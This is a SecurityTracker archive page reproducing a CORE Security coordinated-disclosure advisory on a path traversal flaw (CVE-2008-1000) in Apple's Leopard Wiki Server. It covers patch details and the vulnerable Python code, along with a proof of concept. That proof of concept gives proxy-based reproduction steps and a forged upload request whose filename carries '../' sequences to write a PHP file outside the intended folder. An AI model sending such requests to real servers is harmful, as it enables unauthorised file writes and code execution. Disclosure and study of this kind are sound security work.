SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   OS (UNIX)  >   Apple macOS/OS X Vendors:   Apple
Apple Wiki Server Path Traversal Bug Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1019660
SecurityTracker URL:  http://securitytracker.com/id/1019660
CVE Reference:   CVE-2008-1000   (Links to External Site)
Updated:  Mar 26 2008
Original Entry Date:  Mar 19 2008
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 10.5.x
Description:   A vulnerability was reported in Apple Wiki Server. A remote user can execute arbitrary code on the target system.

A remote user with wiki edit privileges can exploit a path traversal flaw to upload arbitrary code to the target system and then cause the wiki server to execute the code. The code will run with the privileges of the wiki server.

Mac OS X versions prior to 10.5 are not affected.

The vendor was notified on January 30, 2008.

Rodrigo Carvalho of CORE Security Technologies reported this vulnerability.

The original advisory is available at:

http://www.coresecurity.com/?action=item&id=2189

Impact:   A remote user with wiki edit privileges can execute arbitrary code on the target system.
Solution:   The vendor has issued a fix as part of Security Update 2008-002, available from the Software Update pane in System Preferences, or Apple's Software Downloads web site at:

http://www.apple.com/support/downloads/

On March 26, 2008, Apple issued a revised update (Security Update 2008-002 v1.1) for Mac OS X 10.5.2 to correct a non-security reliability issue with the Aperture 'Printer Settings' button. The revised files are listed below.

For Mac OS X v10.5.2
The download file is named: "SecUpd2008-002.v1.1.dmg"
Its SHA-1 digest is: 9e50032326611245bb5382099a60cbcd4d1852c9

For Mac OS X Server v10.5.2
The download file is named: "SecUpdSrvr2008-002.v1.1.dmg"
Its SHA-1 digest is: 73f6085ab0660018635fef28df0589754f50a69a

For Mac OS X v10.4.11 (Universal)
The download file is named: "SecUpd2008-002Univ.dmg"
Its SHA-1 digest is: 49b1c6b1a919b33cbaada1c86eb501291e7145e8

For Mac OS X v10.4.11 (PPC)
The download file is named: "SecUpd2008-002PPC.dmg"
Its SHA-1 digest is: 8a838e33b6720184a4e4e13c17392892e5a06a56

For Mac OS X Server v10.4.11 (Universal)
The download file is named: "SecUpdSrvr2008-002Univ.dmg"
Its SHA-1 digest is: 77074bdd1d0574abe9631b12011f8ef1d15151b3

For Mac OS X Server v10.4.11 (PPC)
The download file is named: "SecUpdSrvr2008-002PPC.dmg"
Its SHA-1 digest is: 1b5f3c1464b1fce0d77f44e50a0b662b467e3fd0

The vendor's advisory is available at:

http://docs.info.apple.com/article.html?artnum=307562

Vendor URL:  docs.info.apple.com/article.html?artnum=307562 (Links to External Site)
Cause:   Input validation error
Underlying OS:  UNIX (macOS/OS X)

Message History:   None.


 Source Message Contents

Subject:  CORE-2008-0123: Leopard Server Remote Path Traversal

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

Leopard Server Remote Path Traversal


*Advisory Information*

Title: Leopard Server Remote Path Traversal
Advisory ID: CORE-2008-0123
Advisory URL: http://www.coresecurity.com/?action=item&id=2189
Date published: 2008-03-18
Date of last update: 2008-03-18
Vendors contacted: Apple Inc.
Release mode: Coordinated release


*Vulnerability Information*

Class: Remote Path Traversal
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 28278	
CVE Name: CVE-2008-1000	


*Vulnerability Description*

MacOS X Server 10.5 [1], also known as Leopard Server features a Wiki
Server [2], which is a multiuser web application written in Python. The
Wiki Server is vulnerable to a path traversal attack, which can be
exploited by non-privileged system users via a forged file upload to
write arbitrary files on locations in the server filesystem, restricted
only by privileges of the Wiki Server application.


*Vulnerable Packages*

. Mac OS X Server v10.5.2 (Leopard Server).
. The Wiki Server is also available for Mac OS X v10.5 (Leopard).


*Non-vulnerable Packages*

View section "Vendor Information, Solutions and Workarounds".

*Vendor Information, Solutions and Workarounds*

Apple security updates are available via the Software Update mechanism:

http://docs.info.apple.com/article.html?artnum=106704

 Apple security updates are also available for manual download via:

http://www.apple.com/support/downloads/

 Cross-reference to Apple security updates:

http://docs.info.apple.com/article.html?artnum=61798


*Credits*

This vulnerability was discovered and researched by Rodrigo Carvalho,
from the Core Security Consulting Services (CSC) team of Core Security
Technologies, during Bugweek 2007. Special thanks to Norberto Kueffner
for infrastructure support.


*Technical Description / Proof of Concept Code*

A path or directory traversal attack technique forces access to files,
directories, and commands that potentially reside outside the web
document root directory. An attacker may manipulate the http requests in
such a way that the web site will write, execute or reveal the contents
of arbitrary files outside the intended path of the web documents. Any
device that exposes an HTTP-based interface is potentially vulnerable to
path traversal.

In the MacOS X Server the python web server called "Wiki Server" is
enabled by default and every system user has a weblog available to post
articles and files. Attached files are written for example in path
'/Library/Collaboration/Users/guest/weblog/3f081.page/attachments/731b1/'
for user 'guest' where '3f081' are hash/random hexa characters assigned
to the blog post title and '731b1' are hash/random hexa characters
assigned to the file uploaded.

Next, we show a Proof of Concept (PoC) attack to the Leopard's Wiki
Server. It creates a file 'popote.php' at '/tmp/[xxxxx]/' where
'[xxxxx]' are random hexa characters assigned to the file, as we have
said. You can write on all the folders where user '_teamsserver', the
user running the Wiki Server, has permissions.

For example, to reproduce the attack using Paros proxy [3], follow these
steps:

- - Check the web server is up.
- - Check you have a system user/password in the system, for example
guest, and the log in.
- - Start editing a new post in your blog.
- - Start Paros proxy, go to Trap tab and enable Trap requests checkbox.
- - Start uploading your preferred file, for example popote.php.
- - In Paros, press Continue until you find the POST request.
- - Append '../../../../../../..' at the beginning of 'popote.php' plus
your wished path, for example '/tmp/'.
- - Press Continue a couple of times to send the request.
- - If user '_teamsserver' has permissions on the wished folder, you will
write file 'popote.php' inside subfolder '[xxxxx]', where [xxxxx] are
hash/random hexa characters that depend on the file.

There are several strategies that can be used in combination with a
path traversal to gain complete control of the victim's server, although
we will not discuss them here.

An example forged request follows:

/-----------

POST http://192.168.xxx.xxx/users/guest/weblog/3f081/attachments HTTP/1.0
User-Agent: Opera/9.24 (Macintosh; Intel Mac OS X; U; en) Paros/3.2.13
Host: 192.168.xxx.xxx
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language:
en,ja;q=0.9,fr;q=0.8,de;q=0.7,es;q=0.6,it;q=0.5,nl;q=0.4,sv;q=0.3,nb;q=0.2,da;q=0.1,fi;q=0.1,pt;q=0.1,zh-CN;q=0.1,zh-TW;q=0.1,ko;q=0.1,ru;q=0.1,en;q=0.1
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: identity, *;q=0
Referer: http://192.168.xxx.xxx/users/guest/weblog/3f081/
Cookie: cookies=1; acl_cache=3; recentTags=add tags here;
SQMSESSID=fe79c978b66bf3bf6d0c433abd6008a6;
sessionID=75706E3C-FA5A-4535-85EA-0D69812D21D3; utcOffset=-3; uploadID=57904
Cookie2: $Version=1
Proxy-Connection: close
Content-length: 426
Content-Type: multipart/form-data; boundary=----------YN7xkbcuNgNx21psG30p21

- ------------YN7xkbcuNgNx21psG30p21

Content-Disposition: form-data; name="Attachment";
filename="../../../../../../../tmp/popote.php"

Content-Type: application/octet-stream



<? phphinfo(); ?>


  ------------YN7xkbcuNgNx21psG30p21

  Content-Disposition: form-data; name="ok_button"



  Attach

  ------------YN7xkbcuNgNx21psG30p21

  Content-Disposition: form-data; name="upload_id"



  57904

  ------------YN7xkbcuNgNx21psG30p21--

- -----------/


    The vulnerable code is located at
'/usr/share/wikid/lib/python/apple_wlt/ContentServer.py':


/-----------

def uploadFileCallback(self, result):
	filename, filetype, aFile = result[1][self.type][0]
	filename = filename.decode('utf-8')
	filename = filename.split('\\')[-1] # IE sends the whole path,
including your local username.
	extension = filename.split('.')[-1]
	oldFilename = filename
	uploadType = os.path.split(self.fullpath)[-1]
	if uploadType == "images":
		filename = SettingsManager.findGoodName() + '.' + extension
	logging.debug("beginning file upload: %s" % filename)
	isImage = filenameIsImage(filename)
	newPath = ImageUtilities.findUniqueFileName(os.path.join(self.fullpath,
filename), isImage = (not uploadType == 'attachments'))
	newFilename = os.path.basename(newPath)
	if uploadType == "attachments":
		newParentFolder = os.path.dirname(newPath)
		os.mkdir(newParentFolder)
		newFilename = os.path.join(os.path.basename(newParentFolder), filename)
      [...]


- -----------/


    The hash/random hexa characters used for the attachment subfolder
are generated by code at
'/usr/share/wikid/lib/python/apple_utilities/ImageUtilities.py':


/-----------

def findUniqueFileName(inPath, isImage = True):
	"""Uniqueifies a file name, to avoid duplicates in images and
attachments"""
	filename = os.path.basename(inPath)
	base, extension = os.path.splitext(filename)
	parent = os.path.dirname(inPath)
	aPath = ''
	mungedName = SettingsManager.findGoodName()
	if not isImage:
		#attachment, so make the minged name a subdirectory and put the file
in that
		aPath = os.path.join(parent, mungedName, filename)
		while os.path.exists(aPath):
			mungedName = SettingsManager.findGoodName(mungedName)
			aPath = os.path.join(parent, mungedName, filename)
	else:
		aPath = os.path.join(parent, mungedName + extension)
		while os.path.exists(aPath):
			mungedName = SettingsManager.findGoodName(mungedName)
			aPath = os.path.join(parent, mungedName + extension)
	return aPath

- -----------/


    One possibility for fixing this issue is to use the function
'safePath' from
'/usr/share/wikid/lib/python/apple_utilities/PathHelper.py' to check if
the filename is sane:


/-----------

def safePath(inPath):
	"""Returns whether the path is safe or not as defined by the absence of
arbitrary path traversal elements"""
	pieces = inPath.split('/')
	if '..' in pieces:
		return False
	return True

- -----------/


*Report Timeline*

. 2008-01-30: Vendor is notified that vulnerabilities were discovered
and that an advisory draft is available.
. 2008-01-31: Vendor acknowledges the notification and requests the draft.
. 2008-01-31: Core sends the draft, including the PoC http request.
. 2008-02-12: Core requests update information on the vulnerability and
offers to coordinate the date of the disclosure.
. 2008-02-18: Core requests again information on the vulnerability.
. 2008-02-18: Vendor replies that the vulnerability will be fixed after
the update to be released in March, and asks Core to keep the issues
private until the disclosure.
. 2008-02-19: Core writes back to the Vendor confirming that the release
will be coordinated unless there are clear indications of the
vulnerability being exploited in the wild, in that case the advisory
will be published as "forced release".
. 2008-03-03: Core requests update info on the vulnerability, a concrete
schedule and text for the advisory section called "Vendor Information,
Solutions and Workarounds".
. 2008-03-04: Vendor sends information to be included in advisory
CORE-2008-0123 including the Vendor's updates channels, draft of
Vendor's own advisory and confirmation that the path traversal affects
Wiki Server as opposed to Calendar Server as said earlier by Core. The
vendor believes the security update will be made publicly available on
March 17th.
. 2008-03-05: Core confirms that information sent by the vendor will be
keep confidential until the release of the fixed version.
. 2008-03-13: Core requests the vendor an update on the coordinated date
of disclosure.
. 2008-03-13: Vendor confirms that the exact date of fix release is
March 18th.
. 2008-03-14: Core acknowledges the mail with the coordinated date.
. 2008-03-18: Advisory CORE-2008-0123 is published.


*References*

[1] http://www.apple.com/server/macosx/
[2] http://www.apple.com/server/macosx/features/wikis.html
[3] Paros proxy http://www.parosproxy.org


*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.


*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


*GPG/PGP Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFH4Bm+yNibggitWa0RAsxBAJ9iZHZeIhBcxO3iCBm8fh24qPnoDACeM621
WtYynuwmUseH2PU7NvmkYr4=
=eCPQ
-----END PGP SIGNATURE-----

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC